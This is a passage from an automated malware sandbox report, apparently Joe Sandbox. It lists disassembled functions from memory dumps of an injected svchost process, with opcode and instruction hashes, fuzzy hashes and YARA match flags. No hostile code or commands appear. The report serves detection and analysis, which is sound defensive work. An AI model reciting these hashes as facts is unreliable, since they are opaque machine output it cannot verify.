                                                                                                                      • Opcode Fuzzy Hash: e786588cff1363e9070494d84507ce750bfe74f841b4441e28607b7f89993574
                                                                                                                      • Instruction Fuzzy Hash: 586134B5E00606DFDB18DF69C8C0AADFBB5FF49200F18856AE519AB340DB34A941CBD0
                                                                                                                      Function 033F92A6 Relevance: .2, Instructions: 174COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 94b3fffbb1d95f078cf146f00f694439d7f01daec3ddeae8cb0e6e3a8d37f6c8
                                                                                                                      • Instruction ID: befd520925aac47bcc1d77e70b9ad53ba0385196cf067cd15067217ff84643b9
                                                                                                                      • Opcode Fuzzy Hash: 94b3fffbb1d95f078cf146f00f694439d7f01daec3ddeae8cb0e6e3a8d37f6c8
                                                                                                                      • Instruction Fuzzy Hash: 446114356087428FD311CF68C8D4B6AF7E4BF90718F58446DEA858F691DB35E846CB81
                                                                                                                      Function 033FCE93 Relevance: .2, Instructions: 172COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                                                      • Instruction ID: 6fb4a225d77843d63d073ee369e8aa56c90a76d6fa4b612b0cbfc6d753118ae7
                                                                                                                      • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                                                      • Instruction Fuzzy Hash: 19514732A4830A4FC700DE288CD0B6BF7DAAFC0250F8D966DEA55CB249DA34D8098791
                                                                                                                      Function 0040FD53 Relevance: .2, Instructions: 165COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 138fe7c44f03b669c9ddc25decb183b1eb250abffe8fa5184e6ea0f9f99aa8bd
                                                                                                                      • Instruction ID: 2121c664a8c5830da041c923ef2f7bbf52f7bd70e106dfbbfbc710aa3fcfd6ec
                                                                                                                      • Opcode Fuzzy Hash: 138fe7c44f03b669c9ddc25decb183b1eb250abffe8fa5184e6ea0f9f99aa8bd
                                                                                                                      • Instruction Fuzzy Hash: CF5173B3E14A214BD3188E09CC40631B792EFD8312B5F81BEDD199B397CE74E9519A90
                                                                                                                      Function 0040FD4A Relevance: .2, Instructions: 161COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: df7008138a3bef6f5c5ea37fbbeba5d92c992cb410192749f52cdfb2a7f4c08f
                                                                                                                      • Instruction ID: 910c2ad70969f591053d0d089f63b2fbef3d456e4ed4111208ad3c3350b7efed
                                                                                                                      • Opcode Fuzzy Hash: df7008138a3bef6f5c5ea37fbbeba5d92c992cb410192749f52cdfb2a7f4c08f
                                                                                                                      • Instruction Fuzzy Hash: BF5182B3E14A214BD3188E09CC40631B692EFC8312B5F81BEDD199B397CE74E9529A90
                                                                                                                      Function 0332B2D3 Relevance: .2, Instructions: 161COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7f6c900829f471f74c63009ca0dabac3f3b8b8625d47fa388ba9b42bb1deb4ad
                                                                                                                      • Instruction ID: b50dae096543f83ee3552ecc87624c5cd50c1d2f43dd6a1da2d97db0b20573d0
                                                                                                                      • Opcode Fuzzy Hash: 7f6c900829f471f74c63009ca0dabac3f3b8b8625d47fa388ba9b42bb1deb4ad
                                                                                                                      • Instruction Fuzzy Hash: 6141F475A00710AFD725EF25DCC0B2AFBA9EF44720F55846AF659AF250DB70EC508B90
                                                                                                                      Function 033F7D73 Relevance: .2, Instructions: 160COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: debe9f0411c2313cd9e8edb79f1118566a859413930961cffd13a82894ed12f8
                                                                                                                      • Instruction ID: 5f77cdcf9df4ac555e703426c159cfb3c2290b8336cb162b27f03c3e4257f6a3
                                                                                                                      • Opcode Fuzzy Hash: debe9f0411c2313cd9e8edb79f1118566a859413930961cffd13a82894ed12f8
                                                                                                                      • Instruction Fuzzy Hash: D151D536A101498FCB08CF68C8806AEB7F1EF58314B59827AD915DB355E730DA15CB90
                                                                                                                      Function 03343740 Relevance: .2, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: daebec5692da15ae4f4ea670d7d5919bb559f255ed39c6f76395efb6c0d63567
                                                                                                                      • Instruction ID: e4b12713975439bb16231063446e4fcf37365ec4495c9589d793503849230759
                                                                                                                      • Opcode Fuzzy Hash: daebec5692da15ae4f4ea670d7d5919bb559f255ed39c6f76395efb6c0d63567
                                                                                                                      • Instruction Fuzzy Hash: AB51CC79A01616ABC711CF68C8C0669FBF4FF44720B0986A5E895DB740E734F9A5CB80
                                                                                                                      Function 03337152 Relevance: .2, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 853164a4137e63649b2e2879a644e58bb27888f93402613abed9180852bd2b79
                                                                                                                      • Instruction ID: 73cf9d7778bdc61a18cff4e8b969db8f38bfde6e4b75ed3a4079564e876968eb
                                                                                                                      • Opcode Fuzzy Hash: 853164a4137e63649b2e2879a644e58bb27888f93402613abed9180852bd2b79
                                                                                                                      • Instruction Fuzzy Hash: 1051DF76E0460AEFEB15DB64CDC4BBEB7B8BF05315F14806AE412A7690DB749911CB80
                                                                                                                      Function 033B3A6C Relevance: .2, Instructions: 156COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ec952784da022ca6166d60fd0c917ad113f44b4ca376c458661a00fea7a29daf
                                                                                                                      • Instruction ID: 36dd2b5a4260c450e4b09cc3e2e46ac0b3ce3f60e7d2b0fed21e4373b0a92a04
                                                                                                                      • Opcode Fuzzy Hash: ec952784da022ca6166d60fd0c917ad113f44b4ca376c458661a00fea7a29daf
                                                                                                                      • Instruction Fuzzy Hash: DC519236E4012D4BDF28CA58D4A1BEFB3F2EB44320F88081AE945BF7C4C7B66956D554
                                                                                                                      Function 033AD800 Relevance: .2, Instructions: 155COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e781152dacae4f1c6882012a55c37f8c385d0cb10099d0cf8dbfa8edeca3e92b
                                                                                                                      • Instruction ID: f311e4e2c4f08beff89a9181ab6720740480ffeab19622687d80fa0b01ea0831
                                                                                                                      • Opcode Fuzzy Hash: e781152dacae4f1c6882012a55c37f8c385d0cb10099d0cf8dbfa8edeca3e92b
                                                                                                                      • Instruction Fuzzy Hash: 6051A074A00A15AFCB14DF6DC8E0ABEB7B8FF45700B19416DE981DBA90E734D950CB91
                                                                                                                      Function 033FD26B Relevance: .2, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                      • Instruction ID: 15a370928858d134be967e077712f771fd0850589d27f8104994105e5ededee6
                                                                                                                      • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                      • Instruction Fuzzy Hash: 8D517D766087429FC711CF28C888B5AB7E5FFC8344F44892DFA948B294D734E945CB52
                                                                                                                      Function 033F7571 Relevance: .2, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1adb4a25a0389892b8a40d1e3755f738b35195d449b8a5e2e7fb855fe0b424c2
                                                                                                                      • Instruction ID: 72302b88e4d38c13ac55d77a5a339a02feaf065f4efa3a3fa2317d0770f6a4a7
                                                                                                                      • Opcode Fuzzy Hash: 1adb4a25a0389892b8a40d1e3755f738b35195d449b8a5e2e7fb855fe0b424c2
                                                                                                                      • Instruction Fuzzy Hash: 6751E531E00116AFDB14DB69D884A7EFBF9FF48390F884169EA05EB250DB70AD15CB80
                                                                                                                      Function 033351ED Relevance: .1, Instructions: 149COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5c9ab111f8efbcca5134e991a9c9b9611ddfbdb9a1896fd4befb91228b47b542
                                                                                                                      • Instruction ID: f033e8c2847552836f2bd1cd60eac66fbe97fc304814f72e2e6f1acbc5a20663
                                                                                                                      • Opcode Fuzzy Hash: 5c9ab111f8efbcca5134e991a9c9b9611ddfbdb9a1896fd4befb91228b47b542
                                                                                                                      • Instruction Fuzzy Hash: F1518C35E06215DFFF25DBA9CCC0BADB3B8AB0A324F188059E851FB250D7B499408B56
                                                                                                                      Function 033B5BF0 Relevance: .1, Instructions: 145COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f01a2e466e5458f1f4d9ae3ae7298915f0465144f71564dc5f3d3a2506a086d2
                                                                                                                      • Instruction ID: 59e3d13d56a246f893039b35813249a4f1359da0334344cf5a3b9cd085fe025a
                                                                                                                      • Opcode Fuzzy Hash: f01a2e466e5458f1f4d9ae3ae7298915f0465144f71564dc5f3d3a2506a086d2
                                                                                                                      • Instruction Fuzzy Hash: CF415A35F407149FDB25FFB898C26EEBAF09F46A10B11456EEA02FF741DA7888004798
                                                                                                                      Function 0336F71F Relevance: .1, Instructions: 143COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 493d5e5121488e8c6baa64e705234981f3f05a3052894ff4ce8f62dfa35bf4d9
                                                                                                                      • Instruction ID: 5c44f191a8d55d9bec6f047449f6285d22c37f35ac68908a02b3c5fd652f3a3a
                                                                                                                      • Opcode Fuzzy Hash: 493d5e5121488e8c6baa64e705234981f3f05a3052894ff4ce8f62dfa35bf4d9
                                                                                                                      • Instruction Fuzzy Hash: 7341967AD05229AFDB11DBA8DCC1AAFB7BCAF05694F054166F900FB604D634DE0087E4
                                                                                                                      Function 033601F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3676d36e809cec0594947eaf00f46269e68974fd6c58fe96b9877c6a0fc88517
                                                                                                                      • Instruction ID: eeebc0881048b7ad79391053898bb06e6a48c6e70dcb9b932340a007cdff3a42
                                                                                                                      • Opcode Fuzzy Hash: 3676d36e809cec0594947eaf00f46269e68974fd6c58fe96b9877c6a0fc88517
                                                                                                                      • Instruction Fuzzy Hash: 3641AE36D052149FCB18DF98C881AEDF7B4FF88610F18816AE816FB244D7349C41CBA4
                                                                                                                      Function 03372750 Relevance: .1, Instructions: 137COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                      • Instruction ID: 2f2a856bb1a2c11aafa183c2cd5a6557040f06742f56d942fc804a1799c29c03
                                                                                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                      • Instruction Fuzzy Hash: 1F513B76A00615DFCB14CF58C980AAEF7B6FF84710F2881A9D815A7390D734AE81CB90
                                                                                                                      Function 033AD1C0 Relevance: .1, Instructions: 135COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                                                      • Instruction ID: 37211a0fab8a832af5e59004417f817ae47196785ee6561300dd2adde1310485
                                                                                                                      • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                                                      • Instruction Fuzzy Hash: 9F512775A00606DFCB18CF68C8916AAFBF1FF48314B18816ED819A7745E734EA90CF90
                                                                                                                      Function 03336154 Relevance: .1, Instructions: 133COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d59e4503ee1b65fd2360d590077e7d967395893ae4aedf51e4318428388f2b77
                                                                                                                      • Instruction ID: d3fcac4e79c3809156812aec3447cd928806a3f2d6b4f4216aeb343ec608ecab
                                                                                                                      • Opcode Fuzzy Hash: d59e4503ee1b65fd2360d590077e7d967395893ae4aedf51e4318428388f2b77
                                                                                                                      • Instruction Fuzzy Hash: 28510770D04616EFDB29DB24CCC5BA9BBB5EF02314F0982A6D425EB6D0D7789981CF40
                                                                                                                      Function 0332B136 Relevance: .1, Instructions: 131COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 54fbc8a160ec953ff60204de7f13040433238fa8a8168c1f4fd5f9772a3cfd30
                                                                                                                      • Instruction ID: c3017958264f29e1f86a36759a5c356f98147983fc94d2fd0f8195562d3c2f8e
                                                                                                                      • Opcode Fuzzy Hash: 54fbc8a160ec953ff60204de7f13040433238fa8a8168c1f4fd5f9772a3cfd30
                                                                                                                      • Instruction Fuzzy Hash: 694179B5A40715AFDB21EF65C8C0B6AFBE8EF00794F048469E551AF660D774E840CBA0
                                                                                                                      Function 033FF0E0 Relevance: .1, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dafdd849bd3e98837569935e6387319366224cc3bc40ea8a2f1d08bf02c5e220
                                                                                                                      • Instruction ID: b1e390a18fef0b9284e170529d1234adb907de5b97dfbcc7bf288ea7fd8ee348
                                                                                                                      • Opcode Fuzzy Hash: dafdd849bd3e98837569935e6387319366224cc3bc40ea8a2f1d08bf02c5e220
                                                                                                                      • Instruction Fuzzy Hash: E741E1752083419FC704CF25D8B587ABBE1FF84215F498A5EF9958B382CB30D809CB61
                                                                                                                      Function 033F866E Relevance: .1, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                      • Instruction ID: 1276a2a51c13dcec49598e2ff4d8ee5af203cbc121cf92367121d175958060b3
                                                                                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                      • Instruction Fuzzy Hash: 9541B575F00219AFDB18DF99CCC5AAFB7BAAF84600F584069E6009B351D670DD058760
                                                                                                                      Function 033DD5B0 Relevance: .1, Instructions: 128COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 45c6ee1eef75011e45aa62cbb3db1fcfab1ea41465469cfd58178ba1a269c77e
                                                                                                                      • Instruction ID: 47d94f1d4e1ff69049a4bf7f5f67635dab9f79b4ec2a3de1607fe97de4bfcf5a
                                                                                                                      • Opcode Fuzzy Hash: 45c6ee1eef75011e45aa62cbb3db1fcfab1ea41465469cfd58178ba1a269c77e
                                                                                                                      • Instruction Fuzzy Hash: D8412232A08294AFCB14DF29D8D1ABAFBF1FF49300F498489E4C58F245C734A456DBA0
                                                                                                                      Function 0332A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                      • Instruction ID: 0f5f5fd517ae32072f520a89d0c067d19a9d2a351a4a599a9c1151edece8e6a3
                                                                                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                      • Instruction Fuzzy Hash: CA412A31A04322DBDB20EFA588D07BAFB76EB50754F19C16AE9459B240DA399D80CB90
                                                                                                                      Function 03360710 Relevance: .1, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                      • Instruction ID: 93762b22b1640281d15e7c5d0036e73496adc23b283e7f787aa085b2acddd29e
                                                                                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                      • Instruction Fuzzy Hash: C241F875A04705EFDB28CF98C9C1AAAB7F8EF18700B10896DE556DB654D730AA44CF60
                                                                                                                      Function 0333262C Relevance: .1, Instructions: 119COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 87b217167a52b2c19f1aef36e5f2d8e575f6bdc5ae1cc4bb7ed87206c654aa9d
                                                                                                                      • Instruction ID: dd9d9656cdce9e1e1b1f375ffd29eb8464052213f7734fce3b5d718c3ba6c5e9
                                                                                                                      • Opcode Fuzzy Hash: 87b217167a52b2c19f1aef36e5f2d8e575f6bdc5ae1cc4bb7ed87206c654aa9d
                                                                                                                      • Instruction Fuzzy Hash: 0D41AD74901714CFC721EF24D980A6AB7F9FF46310F15CAAAE416EF6A1DB70A941CB41
                                                                                                                      Function 033FFFB1 Relevance: .1, Instructions: 117COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ef3d53609fd75c3fbbde3212d074d64537bc980173ae148d822e474c3657d171
                                                                                                                      • Instruction ID: 322b69d77c39f0664790d483b127b4d184f52ae0b98f4a14278e395d6b5494f1
                                                                                                                      • Opcode Fuzzy Hash: ef3d53609fd75c3fbbde3212d074d64537bc980173ae148d822e474c3657d171
                                                                                                                      • Instruction Fuzzy Hash: 3A412331A042599BC750CB2694B0ABBFFF1AF85205F0D81BAD881AF3C2D639C54AC770
                                                                                                                      Function 004018CD Relevance: .1, Instructions: 115COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2eb8d9ee1b1eb2521fd604ec978dc228ff1dee77191ee27f7e17a8b30390318b
                                                                                                                      • Instruction ID: 8c97f7e15f089b390a708fddce04fbeedaf07faee0abc48c861d91f8f5ba3ac2
                                                                                                                      • Opcode Fuzzy Hash: 2eb8d9ee1b1eb2521fd604ec978dc228ff1dee77191ee27f7e17a8b30390318b
                                                                                                                      • Instruction Fuzzy Hash: 793146B1804696DFDB279FB1D4C2592FB65EE46704BA421EDE8805FCAAD3712442CB84
                                                                                                                      Function 033B07C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 73d126a82ddbee6b4d329ecd99033281faffcb165fe18cf6b6ac2855c5e18950
